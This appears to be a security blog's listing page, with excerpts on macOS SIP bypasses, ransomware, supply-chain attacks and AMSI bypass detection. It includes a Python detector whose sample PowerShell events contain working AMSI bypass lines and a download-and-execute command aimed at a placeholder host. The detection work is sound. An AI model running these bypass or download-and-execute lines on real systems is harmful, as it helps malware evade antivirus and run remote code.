What is Red Teaming & How it Benefits Orgs

In today’s increasingly connected world, red teaming has become a critical tool for organizations to test their security and identify possible gaps within their defenses. Red teaming, also known as red cell, adversary simulation, or Cyber Red Team, involves simulating real-world cyber attackers’ tactics, techniques, and procedures (TTPs) to assess an organization’s security posture. In the world of cybersecurity, the term “red teaming” refers to a method of ethical hacking that is goal-oriented and driven…

A Technical Analysis of CVE-2022-22583 and CVE-2022-32800

Exploits & Vulnerabilities. By: Mickey Jin, December 21, 2022
This entry discusses the technical details of how we exploited CVE-2022-22583 using a different method. It also covers the technical details of CVE-2022-32800, another SIP bypass that we discovered more recently. On Jan. 26, 2022, Apple patched a System Integrity Protection (SIP) bypass vulnerability in the PackageKit framework, identified as CVE-2022-22583. Apple shared…

Detecting Windows AMSI Bypass Techniques

Techniques for bypassing the Antimalware Scan Interface (AMSI) were originally used mainly by security researchers and penetration testers. In recent years, however, cybercriminals have adopted them as features of malware routines to evade detection and keep operating on a victim's computer. Before AMSI, detecting fileless threats was difficult. Previously documented AMSI bypass methods include: obfuscation and/or encryption; PowerShell downgrade; hooks and unhooks; memory patching; forcing an error…
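
The bypass methods listed above can be hunted in PowerShell telemetry. What follows is an added example, not code from the original post: a small Python detector run over constructed sample events shaped like PowerShell Script Block Logging records (Event ID 4104) and process-creation records (Event ID 4688). The event layout, field names, the Win32 type name and the sample script text are all constructed for illustration, not real telemetry. It flags four of the techniques named above: the PowerShell downgrade from a "-Version 2" command line, "forcing an error" from the amsiInitFailed field name, memory patching from AmsiScanBuffer being resolved and its page protection changed, and obfuscation from a high count of string splits and backtick escapes. Before matching, it strips backticks and rejoins 'a'+'b' string concatenations, so the split-string variant of amsiInitFailed is still caught by the plain keyword rule.

```python
import re

# Constructed sample events for illustration (not real telemetry). "id" mimics the
# Windows event ID: 4104 = PowerShell script block text, 4688 = process creation.
SAMPLE_EVENTS = [
    {"id": 4104, "text": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                         ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
    {"id": 4104, "text": "$a=[Ref].Assembly.GetType(('System.Management.Automation.A'+'msiU'+'tils'));"
                         "$f=$a.GetField(('amsiInit'+'Failed'),'NonPublic,Static');$f.SetValue($null,$true)"},
    {"id": 4688, "text": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -Version 2 "
                         "-Command IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"},
    {"id": 4104, "text": "$k=[Win32]::LoadLibrary('amsi.dll');$p=[Win32]::GetProcAddress($k,'AmsiScanBuffer');"
                         "[Win32]::VirtualProtect($p,[uint32]5,0x40,[ref]$old)"},
    {"id": 4104, "text": "Get-ChildItem C:\\Users | Where-Object { $_.PSIsContainer }"},
]

# Two cheap obfuscations: backtick escapes inside identifiers or strings ("Am`si")
# and splitting a string into concatenated literals ('Amsi'+'Utils').
STRING_SPLIT = re.compile(r"""['"]\s*\+\s*['"]""")
OBFUSCATION_THRESHOLD = 3  # splits + backticks in one script block; tune per environment


def normalize(text: str) -> str:
    """Undo backtick escapes and string splitting, then lower-case for matching."""
    return STRING_SPLIT.sub("", text.replace("`", "")).lower()


# (technique, event IDs the rule applies to, pattern matched against the normalized text)
RULES = [
    ("PowerShell downgrade", {4688},
     re.compile(r"powershell(\.exe)?\b.*\s-v(ersion)?\s+2\b")),
    ("Forcing an error", {4104},
     re.compile(r"amsiinitfailed")),
    ("Memory patching", {4104},
     re.compile(r"amsiscanbuffer.*(virtualprotect|writeprocessmemory|marshal\]::copy)")),
]


def obfuscation_score(text: str) -> int:
    """Count string splits and backticks in the raw (un-normalized) script block."""
    return len(STRING_SPLIT.findall(text)) + text.count("`")


def detect(events):
    """Return (event_index, technique) pairs for every rule that fires."""
    findings = []
    for i, ev in enumerate(events):
        norm = normalize(ev["text"])
        for technique, ids, pattern in RULES:
            if ev["id"] in ids and pattern.search(norm):
                findings.append((i, technique))
        # Obfuscation is scored on the raw text, since normalization removes the evidence.
        if ev["id"] == 4104 and obfuscation_score(ev["text"]) >= OBFUSCATION_THRESHOLD:
            findings.append((i, "Obfuscation"))
    return findings


if __name__ == "__main__":
    for idx, technique in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {technique}")
```

The second sample event is the point of the normalization step: a naive substring search for "amsiInitFailed" misses the split-string variant, while the normalized text still matches, and the split count separately flags the block as obfuscated. Hook-based bypasses are not covered here, since they leave no reliable trace in script block text alone.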

Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities

A new bypass appears
According to the aforementioned patch, if we can bypass the volume path check at line 81, the system_installd service will spawn the script directly instead of resorting to the isolated XPC service. The question, then, is how to bypass the volume path check. Through debugging, we found that the destination volume path returned at line 80 is an arbitrary mounted DMG volume path that we…

Trend Helps Google Play Prevent Malicious Apps via ADA

By: Jon Clay, December 16, 2022
Trend Micro will be joining Google's App Defense Alliance (ADA) to help improve the alliance's ability to identify malicious apps before they are published to the Google Play store. Google has announced that Trend Micro will be joining its App Defense Alliance (ADA) to help improve their ability to identify malicious apps before they are published to the…

Ransomware Business Models: Future Pivots and Trends

RDP (TCP port 3389) remains a popular service abused by ransomware actors to gain initial access to systems in on-premises infrastructure. However, as more organizations move file storage and Active Directory to cloud services, ransomware groups will look for more opportunities to develop and/or exploit vulnerabilities not yet leveraged at scale.
Evolutions
Gradual evolutions in the modern ransomware models as we know them are expected to be tweaked in…

Probing Weaponized Chat Applications Abused in Supply-Chain Attacks

In late September 2022, threat researchers uncovered a supply-chain attack in which malicious actors distributed a trojanized installer of Comm100, a chat-based customer engagement application. Our investigation of the incident revealed that the breadth and depth of the campaign's impact were greater than the researchers had initially thought: more applications and versions were affected, and the attacks began much earlier than their first reckoning on…

CVE-2019-8561 A Hard-to-Banish PackageKit Framework Vulnerability in macOS

At line 28, if the offset value of the payload subpath inside the PKG file is not equal to zero, the “-[PKLeopardPackage payloadExtractorWithDestination:externalRoot:error:]” function will call the “-[PKPayloadCopier initWithArchivePath:offset:destination:]” function. Similar to the second method, there is a “triple fetch” issue. If the offset value is equal to zero, it will extract the payload from a special external root path, which seems to be unrestricted and can be controlled by an attacker. This means that…

Hack the Real Box: APT41’s New Subgroup Earth Longzhi

APT & Targeted Attacks. By: Hara Hiroaki, Ted Lee, November 09, 2022
We looked into the campaigns deployed by Earth Longzhi, a new subgroup of the advanced persistent threat (APT) group APT41. This entry breaks down the technical details of the campaigns in full, as presented at HITCON PEACE 2022 in August. In early 2022, we investigated an incident that compromised a company…

Latest on OpenSSL 3.0.7 Bug & Security-Fix

What to know and do about this week's OpenSSL vulnerability
A new vulnerability has just been disclosed in OpenSSL, an open-source cryptography library that is very widely used in commercial and internal applications to provide encryption and other security and privacy capabilities. OpenSSL is found in applications deployed on-premises, in the cloud, in SaaS applications, on endpoints and servers, in IoT or OT environments, and more.
What is the issue in OpenSSL?
The…
